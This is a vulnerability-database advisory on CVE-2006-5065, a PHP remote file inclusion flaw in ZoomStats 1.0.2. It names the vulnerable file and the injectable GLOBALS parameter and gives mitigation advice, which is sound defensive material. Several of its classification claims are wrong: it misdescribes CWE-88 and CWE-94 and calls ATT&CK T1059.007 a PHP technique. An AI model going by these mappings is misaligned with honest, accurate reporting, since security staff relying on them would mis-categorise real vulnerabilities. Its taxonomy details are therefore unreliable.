CVE-2006-5065 in ZoomStats
Summary
by MITRE
PHP remote file inclusion vulnerability in libs/dbmax/mysql.php in ZoomStats 1.0.2 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[lib][db][path] parameter.
If you want to get best quality of vulnerability data, you may have to visit VulDB.
Analysis
by VulDB Data Team • 04/23/2026
The vulnerability described in CVE-2006-5065 represents a critical remote file inclusion flaw in the ZoomStats web application version 1.0.2 and earlier. This vulnerability specifically targets the mysql.php file located within the libs/dbmax directory structure of the application. The flaw arises from improper input validation and sanitization mechanisms that fail to properly handle user-supplied data, creating an avenue for malicious code execution. The vulnerability is particularly dangerous because it leverages the deprecated register_globals PHP configuration setting, which automatically creates global variables from request parameters, significantly amplifying the attack surface.
The technical exploitation of this vulnerability occurs through manipulation of the GLOBALS[lib][db][path] parameter within the application's request handling mechanism. When register_globals is enabled, the application inadvertently converts this parameter into a global variable, allowing attackers to inject malicious URLs that point to remote servers hosting malicious PHP code. This injection occurs during the database connection process where the application attempts to include a file specified by the path parameter. The vulnerability is classified under CWE-88, which describes improper neutralization of special elements used in an OS command, and more specifically aligns with CWE-94, which addresses the execution of code with elevated privileges. The attack vector follows the ATT&CK technique T1059.007 for PHP command execution and T1190 for exploitation of remote file inclusion vulnerabilities.
The operational impact of this vulnerability extends beyond simple code execution, as it enables attackers to gain full control over the affected web server. Once successfully exploited, adversaries can upload additional malicious payloads, establish persistent backdoors, and potentially escalate privileges to execute arbitrary commands on the underlying operating system. The vulnerability affects web applications running on PHP environments with register_globals enabled, which was common in older PHP configurations before the setting was deprecated in PHP 5.3.0 and removed in PHP 5.4.0. The risk is particularly high in shared hosting environments where multiple applications share the same server resources, as successful exploitation could lead to compromise of other applications hosted on the same server infrastructure.
Mitigation strategies for this vulnerability must address both immediate remediation and long-term architectural improvements. The primary recommendation involves disabling the register_globals setting in PHP configuration files, which eliminates the automatic creation of global variables from request parameters. Additionally, developers should implement proper input validation and sanitization mechanisms that prevent malicious data from being processed as file paths. The application should employ absolute path validation, use allowlists for acceptable file paths, and implement proper output encoding techniques. Security measures should also include regular code reviews focusing on file inclusion patterns and parameter handling, as well as implementing web application firewalls that can detect and block suspicious parameter injection attempts. Organizations should also consider implementing the principle of least privilege, ensuring that web applications run with minimal required permissions and that file inclusion operations are strictly controlled through secure coding practices. The vulnerability demonstrates the importance of adhering to secure coding guidelines and the dangers of relying on deprecated PHP configurations that create inherent security weaknesses in application design.